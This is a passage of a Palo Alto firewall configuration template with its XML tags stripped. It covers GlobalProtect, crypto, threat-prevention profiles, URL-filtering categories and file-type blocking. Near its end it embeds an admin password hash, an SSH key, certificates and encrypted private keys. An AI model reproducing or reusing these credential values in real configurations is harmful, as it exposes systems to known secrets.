+ mgmt-interface-swap + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + + + + + + + + + + ethernet1/1 + + + + + + + + ethernet1/1 + vlan + loopback + tunnel + + + + gp-default + + + + + + + + + + + no + Any + local + Enter login credentials + Username + Password + + + portal-ssl-tls + + ipv4 + ethernet1/1 + + + factory-default + factory-default + + + + + + + + + + + 20 + yes + + + + + + + 52.200.14.80 + + + + 1 + + + no + + + 5 + + + + no + + + any + + + any + + + 0 + 0 + + + + + + user-logon + + + + + 24 + + + + + allowed + + + + + prompt + + + + + yes + + + + + yes + + + + + yes + + + + + 30 + + + + + 5 + + + + + no + + + + + 0 + + + + + 15 + + + + + yes + + + + + <div style="font-family:'Helvetica Neue';"><h1 
style="color:red;text-align:center; margin: 0; font-size: 30px;">Notice</h1><p style="margin: 0;font-size: 15px; line-height: 1.2em;">To access the network, you must first connect to GlobalProtect.</p></div> + + + + + yes + + + + + no + + + + + <div style="font-family:'Helvetica Neue';"><h1 style="color:red;text-align:center; margin: 0; font-size: 30px;">Captive Portal Detected</h1><p style="margin: 0; font-size: 15px; line-height: 1.2em;">GlobalProtect has temporarily permitted network access for you to connect to the Internet. Follow instructions from your internet provider.</p><p style="margin: 0; font-size: 15px; line-height: 1.2em;">If you let the connection time out, open GlobalProtect and click Connect to try again.</p></div> + + + + + user-and-machine + + + + + 7 + + + + + yes + + + + + yes + + + + + yes + + + + + yes + + + + + yes + + + + + yes + + + + + yes + + + + + yes + + + + + 0 + + + + + -1 + + + + + no + + + + + 0 + + + + + 5 + + + + + 5 + + + + + 30 + + + + + yes + + + + + no + + + + + no + + + + + yes + + + + + yes + + + + + no + + + + + 4501 + + + + + You have attempted to access a protected resource that requires additional authentication. Proceed to authenticate at + + + + + yes + + + + + no + + + + + 1 + no + no + no + no + 443 + + + -AQ==9EIXqBFzhp4IZxdTxSVTZG/12Vs=iH76LFLerpHJ1S680bBopQ== + + + no + + + + + + + + + + + + + + + + Block outbound sessions that match a malicious domain and have been redirected to a configured sinkhole IP address. + + any + + + any + + + any + + + Sinkhole-IPv4 + Sinkhole-IPv6 + + + any + + + any + + + any + + + any + + + any + + deny + default + + Outbound + + Outbound + + + + + + + allow + no + yes + + + Inbound + + + default + + + drop + no + yes + default + + + + + + + + + + + any + + + any + + + + + + any + + + any + + + any + + + any + + + any + + Recommended_Decryption_Profile + no-decrypt + This rule does not do Decryption. This rule is validating SSL Protocol Communications. + + + + + + + + + + + + + + + + + + + + + + +
+ + 72.5.65.111 + + + 2600:5200::1 + +
+ + + + + + + + + Outbound-AV + + + Outbound-AS + + + Outbound-VP + + + Outbound-URL + + + Outbound-FB + + + Outbound-WF + + + + + Inbound-AV + + + Inbound-AS + + + Inbound-VP + + + Inbound-FB + + + Inbound-WF + + + + + Internal-AV + + + Internal-AS + + + Internal-VP + + + Internal-FB + + + Internal-WF + + + + + Alert-Only-AV + + + Alert-Only-AS + + + Alert-Only-VP + + + Alert-Only-URL + + + Alert-Only-FB + + + Alert-Only-WF + + + + + Outbound-AV + + + Outbound-AS + + + Outbound-VP + + + Outbound-URL + + + Outbound-FB + + + Outbound-WF + + + + + + + color3 + + + color24 + + + color20 + + + color13 + + + Outbound to the Internet + + + Inbound from the Internet + + + Internal to Internal + + + version 1.0.6: version of this iron-skillet template file + + + + + + + + + + + + + alert + alert + + + alert + alert + + + alert + alert + + + alert + alert + + + alert + alert + + + alert + alert + + + + + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + + + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + + + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + + + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + Use this profile for rules needing modifications to the standard + + + + + + + + + + + single-packet + + + + 72.5.65.111 + 2600:5200::1 + + + + + + + + + high + critical + medium + + any + any + single-packet + + + + + + + low + informational + + any + any + disable + + + + + + + + + + + single-packet + + + + 72.5.65.111 + 2600:5200::1 + + + + + + + + + high + critical + medium + + any + any + single-packet + + + + + + + low + informational + + any + any + disable + + + + + + + + + + + single-packet + + + + 72.5.65.111 + 2600:5200::1 + + + + + + + + + high + critical + + any + any + single-packet + + + + + + + low + informational + medium + + any + any + disable + + + + + + + + + + + disable + + + + 72.5.65.111 + 2600:5200::1 + + + + + + + + + any + + any + any + disable + + + + + + + + + + + single-packet + + + + 72.5.65.111 + 2600:5200::1 + + + + + + + + + + any + + + any + + + critical + + any + client + any + disable + + + + + + + any + + + any + + + high + + any + client + any + disable + + + + + + + any + + + any + + + medium + + any + client + any + disable + + + + + + + any + + + any + + + critical + + any + server + any + disable + + + + + + + any + + + any + + + high + + any + server + any + disable + + + + + + + any + + + any + + + medium + + any + server + any + disable + + + + + + + + + + + + + WW's profile + + + + + + + + + any + + + critical + high + medium + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + + + any + + any + any + any + disable + + + + + + + + + + + any + + + critical + high + medium + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + + + any + + any + any + any + disable + + + + + + + + + + + any + + + critical + high + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + medium + + + any + + any + any + any + 
disable + + + + + + + + + + + any + + + any + + + any + + any + any + any + disable + + + + + + + + + + + + high + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + White-List + + + yes + yes + yes + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + White-List + + + command-and-control + hacking + malware + phishing + Black-List + + + + + + + + medium + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + 
swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + White-List + + + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + White-List + + + + + + + + high + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + White-List + + + yes + yes + yes + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + 
streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + White-List + + + command-and-control + hacking + malware + phishing + Black-List + + + + + + URL List + + + URL List + + + URL List + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + dll + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + dll + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + + + + + + + + + + yes + yes + yes + yes + yes + yes + + + yes + yes + + + no + no + + + yes + yes + + + tls1-2 + no + no + no + no + + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + +
+
+
+
+ + + + $1$cymvlwsn$RRpD0YIgly7MQi2OwhBhV0 + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo= + + + + yes + 8 + + + + + + e8d8421e + e8d8421e + Mar 25 14:04:21 2020 GMT + /CN=GP-CA + Mar 25 14:04:21 2021 GMT + GP-CA + 1616681061 + yes + /CN=GP-CA + -----BEGIN CERTIFICATE----- +MIICwDCCAaigAwIBAgIJANrYfmxATInkMA0GCSqGSIb3DQEBCwUAMBAxDjAMBgNV +BAMTBUdQLUNBMB4XDTIwMDMyNTE0MDQyMVoXDTIxMDMyNTE0MDQyMVowEDEOMAwG +A1UEAxMFR1AtQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCsRu/s +uKqCjcZ72Yw5vN7HOQ8VoRZdafB8FAPNS5+Az+9KBNlKRAIT9K342JDZis4loQ3T +iN6rw8h2tN3vQH987q31bSTUT3ztd82gl/EzRexRNcGwQzm4VgtbzmTm2qnqqIps +DueALRDu0SZZX++EWufWxko5wiz+rk0ie3KgGYXJlFzf70Hwnf5P6/fWOIHutk9b +5n4CP1JMdP5ihF8EmRxwqTDzUpBU+MKU+QkpGkIh4dADvDiPEi55N9sRWkqxqOP5 +E78OxxUKGZua1eItevFjU45fQRKc2tyavVIhQjy/Z044rqJF60mt+r0v6er7i3o6 +KluBdl7P9dLeGdahAgMBAAGjHTAbMAwGA1UdEwQFMAMBAf8wCwYDVR0PBAQDAgIE +MA0GCSqGSIb3DQEBCwUAA4IBAQBH5ANVFfZjJNCT+/448Ic3xCj5R5PepeATU45m ++nGNhjVpE4615A4gnKbBdY0m/LDLJX0tmlmGLPNxJzIyW65gz0i9fXtNydp3Bw6c +j9HD78IJST3o8wxREMzii+qhHyyv7Z3rjVYl2ZCQleWJ/Sl1u4Fui1pv1TSJ9g76 +nlWZYAvojlohXKZ+w8ApPantfAYtbh2cxfeml5abP7SfRDOWJxnNH/t/4fkwbh2t +TiKlWPCWC97tIqhu8tGZAVcW10pi3OJxT7FQ3n85p3xC59SgkN7O4W2Z/v9JnYan +QvnpOZcbAGndlh45yV1ePK+NiAgRPRYfL7M18pPXXaWdfr1L +-----END CERTIFICATE----- + + RSA + -AQ==cCMHUK/S6nkVFYzdgY+hCSo7iGU=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 + + + a505da21 + e8d8421e + Mar 25 14:04:43 2020 GMT + /CN=GP-CA + Mar 25 14:04:43 2021 GMT + dummy-portal-cert + 1616681083 + no + /CN=dummy-portal-cert + -----BEGIN CERTIFICATE----- +MIIDFzCCAf+gAwIBAgIEa51q2zANBgkqhkiG9w0BAQsFADAQMQ4wDAYDVQQDEwVH +UC1DQTAeFw0yMDAzMjUxNDA0NDNaFw0yMTAzMjUxNDA0NDNaMBwxGjAYBgNVBAMT +EWR1bW15LXBvcnRhbC1jZXJ0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC +AQEA2lQTCdFX9ipNB5vNvsr1StRKySrYXfAFp2zd4+n6d7SbauoIYgJ4H3TNqMjC +g0LqWj4ZIueD32DfLRGg1E+I+wlOMjHorT9WWl/s9rHnzWZcLiXB9+//dwOnOb7D +cmTKAEsyKMKuvAlcLZE/+2o0cBAEMZiOFseAnN//tOOBfw4ps/mdeGVnkdUxcDNw +qt7zuLewAuoWWYNG89kDK+yl+osk8HwVWb2h1hzX4ru3eA6Eu/Mi7LjVKmjA7rkf +Uuznxd+WXsXVzOXhZ+zcTjiWganOw68/indTlEnlr4AjDp2fjh0KHvN1RS+9LpG1 +q3/j6nG43rjqTgw4ck+B5oxdywIDAQABo20wazAJBgNVHRMEAjAAMAsGA1UdDwQE +AwIDuDAnBgNVHSUEIDAeBggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUFBwMFMAkG +A1UdIwQCMAAwHQYDVR0OBBYEFMWfabSY9YsC5BxBsrW4YO25OhynMA0GCSqGSIb3 +DQEBCwUAA4IBAQARAtUAkncs7l+DEkRXI6eH0h5eQmwV51fNtTL1ZoXgol8RPQXS +MbfFmNZXlkDvC3cTeSuUABC6XYuK/YtTPR91H+c5JxZpDviPsZCRfPPVdXG3qO9+ +RDXMcCHQszSwiEfSnv031L0RKKhbxYBxhLQH+Rtj98gsRIBNvFDxcwxxesyjwXxd +Dn94Ai0XjpfRXUN8A3kpLm3w4D8Thly7Rbm48teG7iLTnp8cqIeXLTUoFVOy8q8i +mF0yAHinKlZowbAFo9u2OABVzRjWDcE9z0fUn8Nv1nrG8ROLlhGb3/S7wZYB6BZl ++wPtFwy/ddXpFb2dtfGk87+tbHiIk5jf2jCY +-----END CERTIFICATE----- + + RSA + 
-AQ==/DO+X7/5/0zLt2M6gBYgg8Ayu4g=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 + + + a0cb01b7 + e8d8421e + Mar 25 14:05:09 2020 GMT + /CN=GP-CA + Mar 25 14:05:09 2021 GMT + dummy-gw-cert + 1616681109 + no + /CN=dummy-gw-cert + -----BEGIN CERTIFICATE----- +MIIDEzCCAfugAwIBAgIEa51q3DANBgkqhkiG9w0BAQsFADAQMQ4wDAYDVQQDEwVH +UC1DQTAeFw0yMDAzMjUxNDA1MDlaFw0yMTAzMjUxNDA1MDlaMBgxFjAUBgNVBAMT +DWR1bW15LWd3LWNlcnQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC7 +5By6OdRX2G2leyF+aVtOXZGKlCR0RUPPQckzIxTOs8duBwPJmXPGLpeh13tVJtEv +09bOpjHGOqJFfm/CO0R0NIxyMF4IurTIbw7eGGP/jg/SMXVi/XNTy2TRGteVJUch +jzxPpZiIxJmo5fzI7aKcxUXobuO+495u6tsHxYevmpg28RacK74GMqoGTC8+E1d2 +fXd0qMQyseuJsU6zEWOqwjEsC0Gqhwbq4byhdQbJW2juaSD1piv89Ed75MH7btUR +DJKHRnhNMcvpDnoH3IlQynRtLHUQjxlXUBRWlrCCjUOd0a/XWNgjT69iDa6K0V4s +WkH9QIaOGotafVZShYU/AgMBAAGjbTBrMAkGA1UdEwQCMAAwCwYDVR0PBAQDAgO4 +MCcGA1UdJQQgMB4GCCsGAQUFBwMBBggrBgEFBQcDAgYIKwYBBQUHAwUwCQYDVR0j +BAIwADAdBgNVHQ4EFgQUzD9VvicyV2Bx4njYSjUHMYPqGe4wDQYJKoZIhvcNAQEL +BQADggEBAAwXTc9lMGZurI7j7BmxF5vNdRf86rwSJK70S/WMm7BHfFo4eRdqoa+J +Q90nm89osWMT3aXKriZ+ge7iq5jtu5r4vOPKelEbEa6vuXg2eaHpL23HBUxeTkNI +DxfYhMogoKFoiX9/zRBy+8lWz4b2IquAcjWFA4GWPfX+JtAUDpwAQFyIBxU0x4wy +hy8kLsAh+tuZfWgTFrYBS0tiV62Amtcl3/+G/zyoQ2orKtTHPBTaHOG3d3zLsQJ3 +c+PZn6KlSWAf2VthbbPnn1hvMxU+c7w2lWQX64FSzLt4LQSol7qnyLROgFKTKVXG +EB826Ks5mv+qxogo1C6hLvdpiHUp+ys= +-----END 
